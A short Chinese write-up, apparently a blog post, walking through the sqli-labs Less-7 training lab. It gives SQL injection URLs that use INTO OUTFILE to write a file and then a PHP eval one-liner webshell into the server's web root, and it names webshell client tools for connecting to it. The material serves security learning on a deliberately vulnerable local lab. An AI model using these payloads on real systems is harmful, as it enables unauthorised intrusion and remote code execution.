0%

sqli-labs靶场Less-7(上传webshell)

Less7

本关利用文件导入的方式进行注入

查看源码,重点关注对id参数的处理和sql语句上,源代码如下:

1
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

这里对id参数进行了’))处理,所以可以尝试')) or 1=1--+进行注入

image

我们这里利用上述提到的文件导入的方式进行演示:

1
http://127.0.0.1/sqli-labs/Less-7/?id=1'))UNION SELECT 1,2,3 into outfile "D:\\phpStudy\\WWW\\sqli-labs\\Less-7\\1.txt"--+

image

上图中显示sql语句出错了,但是文件中可以看到1.txt已经生成了。

image

直接写入php一句话

1
http://127.0.0.1/sqli-labs/Less-7/?id=1'))UNION SELECT 1,2,'<?php @eval($_post["mima"])?>' into outfile "D:\\phpStudy\\WWW\\sqli-labs\\Less-7\\yijuhua.php"--+

image

文件中可以看到已经上传成功了

image

然后使用冰蝎、菜刀等工具连接即可